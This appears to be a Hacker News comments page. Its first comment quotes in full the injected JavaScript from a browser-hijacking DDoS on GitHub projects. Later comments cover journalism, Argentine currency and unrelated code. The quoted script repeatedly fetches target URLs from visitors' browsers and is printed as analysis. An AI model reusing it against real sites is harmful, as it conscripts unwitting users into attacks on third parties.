Hacker Newsnew | comments | show | ask | jobs | submit | login

From the Sony pictures incident to the attack on that satirical magazine in Paris to this, it's getting pretty tiresome having to deal with authoritarian types who believe they should dictate what other people can say or access.

For those curious, see below for a write up of the malicious javascript (uses a simple ajax call & random number timer): http://insight-labs.org/?p=1682

document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"> \x3c/script>"); !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");

startime = (new Date).getTime();

var count = 0;

function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 }

url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];

NUM = url_array.length;

function r_send2() { var a = unixtime() % NUM; get(url_array[a]) }

function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } }) }

function r_send(a) { setTimeout("r_send2()", a) } setTimeout("r_send2()", 2E3);

-----


Loading all of jQuery seems a little bit excessive when the only thing they're using is the $.ajax function. http://youmightnotneedjquery.com/#request

-----


It's excessive if your goal is _solely_ to execute a repeating AJAX request. But, if I'm understanding the attack correctly, this script is injected _in place of_ jQuery requested from Baidu's CDN. If you want the affected sites to appear normal, so the users whose browsers you are highjacking will contribute to the DDOS for the longest possible period, then you want to ensure that jQuery does indeed load.

The OP further clarifies why jQuery is injected _twice_: seems the injection is occurring only for 1% of requests. So it appears the code is looking to see if it has triggered the injection itself, and fires another request if needed.

-----


On which side are you ._.

-----


Engineers don't care what side anybody is on, as long as the tech works.

-----


> Engineers don't care what side anybody is on, as long as the tech works.

Good engineers do care. Don't mistake "being an engineer" with "being apathetic".

-----


Really?

We knew the world would not be the same. A few people laughed, a few people cried, most people were silent. I remembered the line from the Hindu scripture, the Bhagavad-Gita... "Now, I am become Death, the destroyer of worlds."

Any engineer worth his salt absolutely understands the consequences of their actions on the world. Sometimes they understand a bit too late.

-----


hey buddy

-----


What's up pvam

-----


He still went along with it.

-----


> the Sony pictures incident

Most likely unrelated to North Korea and used for propagandistic purposes (including publicity for a below par movie).

-----


That's interesting you mention rice farmers in TX because in Sacramento rice farmers are getting paid to sell not rice but water to Los Angeles.

Evidently many of these folks will probably end up making more $$ selling water than rice

See: http://www.sacbee.com/news/state/california/water-and-drough...

-----


Check out Batsh (which "compiles" to Bash *.bat):

Editor: http://batsh.org/

Source: https://github.com/BYVoid/Batsh/

-----


That reminds me of the 14 steps & sub steps to take a screenshot on a DroidX in 2010: http://www.droid-life.com/2010/07/22/how-to-take-screenshots...

-----


It's b/c it's the NYTimes-- they actually do reporting & journalism.

There's seems to be a lot of piggybacking/freeloading off of original reporting. I was involved with a project that got a big splashy NYTimes write up and it was astonishing in the coming days to see how many joker press outlets basically crimped off the Times' original reporting. They'd include a link and all that but they'd lift the juciest quotes/content and the only thing they'd contribute was some usually sassy commentary.

Here's a really vivid example-- great write up about Target detecting a pregnancy from purchase data: http://www.nytimes.com/2012/02/19/magazine/shopping-habits.h...

It's a great little news nugget- provocative, interesting, yadda yadda.

And then before you know it, all these "summary"/"reaction" stories get published which didn't exactly contribute much or move the ball down the field:

http://www.forbes.com/sites/kashmirhill/2012/02/16/how-targe...

http://techland.time.com/2012/02/17/how-target-knew-a-high-s...

http://www.dailymail.co.uk/news/article-2102859/How-Target-k...

http://www.businessinsider.com/the-incredible-story-of-how-t...

I'm not sure if this is a real problem or not, but it seems kind of lame that those other groups get to sit on their cans and pontificate while others get out of their offices.

-----


See https://en.wikipedia.org/wiki/Churnalism:

> In his book Flat Earth News,[3] the British journalist Nick Davies reported a study at Cardiff University by Professor Justin Lewis and a team of researchers[4] which found that 80% of the stories in Britain's quality press were not original and that only 12% of stories were generated by reporters.[1]

-----


This has been a standard practice with journalism for a long, long time.

-----


THAT is some clever detective work!

To give 'em the benefit of the doubt-- perhaps perhaps perhaps they needed that particular domain in anticipation of some other instance where they dropped the ball but your conclusion is more compelling.

-----


They recently changed their name. Could be that they wanted to use the domain for something else initially.

-----


Very much the real deal-- costs $3. It also creates an entry in Newstand.

If you can't read French, you buy the English edition and tap the text to see a translation: http://i.imgur.com/ETunCZv.jpg

From what I understand, this magazine had a circulation of maybe 50,000 but with the most recent edition 3million didn't come close to meeting demand. This is a very creative solution.

-----


Heard a story on the radio this morning about a couple in Argentina that cooks meals for tourists in their home. They stopped processing areservations in pesos b/c they couldn't confidently predict the price even two months out. Now they only deal in dollars

These people: http://www.npr.org/blogs/parallels/2014/12/16/370979773/arge...

-----


I spent 5 months in Argentina - this is extremely common practice. For anything of value (rent, cars, etc.) everyone uses dollars, because you wouldn't want to be stuck with mountains of pesos then have the value slashed in half again.

Dollars are assumed to be much more stable.

-----


Apparently bitcoin is very popular in Argentina for that exact reason: http://www.economist.com/blogs/schumpeter/2014/06/bitcoin-ar...

-----


You know your currency is fucked when Bitcoin is seen as the more stable option.

-----


Yet... Bitcoin has performed worse than the Ruble.

http://qz.com/312598/bitcoin-is-the-worst-investment-of-2014...

-----


It's not so much that they can't predict the price it's that every dollar is worth significantly more on the black market as the official market rate. Compare the dollar blue (Blue) row with the offical bank rate (Oficial). 13.19 vs 8.57. Many people change every peso they earn to dollars immediately. (www.dolarblue.net)

-----


What's stopping them from arbitraging the price difference?

-----


It's impossible to buy dollars at the official price. They are very tightly controlled.

-----


I believe that the banks are mostly Dollar->peso conversions and are extremely supply limited or cutoff from going the other way, and the black market is a both ways market.

-----


Police pointing guns at them?

-----


See line 17, https://github.com/Igglyboo/hn_collapse/blob/master/collapse...

var currentRow = comment.parentNode.parentNode.parentNode.parentNode.parentNode.parentNode.nextSibling;

Lotta parentNodes!

-----


Looks like this happened a couple months ago too: https://news.ycombinator.com/item?id=8401784

-----

More

Guidelines | FAQ | Support | API | Lists | Bookmarklet | DMCA | Y Combinator | Apply | Contact

Search: